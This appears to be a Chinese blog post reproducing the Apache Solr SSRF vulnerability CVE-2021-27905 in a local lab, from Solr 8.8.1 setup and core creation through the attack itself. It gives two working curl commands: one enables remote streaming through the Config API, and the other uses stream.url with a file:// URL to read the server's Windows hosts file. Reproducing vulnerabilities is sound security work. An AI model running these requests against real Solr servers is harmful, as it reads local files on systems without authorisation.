码迷,mamicode.com
首页 > Web开发 > 详细

复现Apache Solr SSRF(CVE-2021-27905)

时间:2021-05-24 07:52:16      阅读:0      评论:0      收藏:0      [点我收藏+]

标签:format   nts   run   err   creat   get   may   max   select   

一、环境搭建

下载源码

http://archive.apache.org/dist/lucene/solr/8.8.1/

技术图片

下载完后解压进入bin目录并开cmd窗口

执行

solr start -p 3333

技术图片

然后浏览器访问ip:3333

 

 

二、按如下步骤创建core

技术图片

过程中没有出现报错

 

这一步如果出现红色报错的话,就按照如下步骤解决:
此时Solr已经在server/solr目录下已经创建了名字为new_core的文件夹,我们只需要把server/solr/configsets/default文件夹下的conf目录整个拷贝到new_core文件夹下,即可

 

 

 

技术图片

 

再回到界面进行重新创建即可成功

 

 

 

 

 

三、漏洞复现

 

通过访问ip:3333/solr/admin/cores?indexInfo=false&wt=json,可以看到当前core名称

 

技术图片

 

 

 

结合刚才得到的core名称访问http://192.168.43.244:3333/solr/new_core/config,得到以下页面

 

 

 

技术图片

 

 

 

利用Config API打开默认关闭的requestDispatcher.requestParsers.enableRemoteStreaming开关(使用curl)。

 

curl -d "{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}" http://192.168.43.244:3333/solr/new_core/config -H "Content-type:application/json"

 

技术图片

 

 

 

stream.url参数利用file伪协议读取本机的hosts的文件

 

curl "http://192.168.43.244:3333/solr/new_core/debug/dump?param=ContentStreams" -F "stream.url=file:///C:\Windows\System32\drivers\etc\hosts"

 

技术图片

 

复现Apache Solr SSRF(CVE-2021-27905)

标签:format   nts   run   err   creat   get   may   max   select   

原文地址:https://www.cnblogs.com/impulse-/p/14764589.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!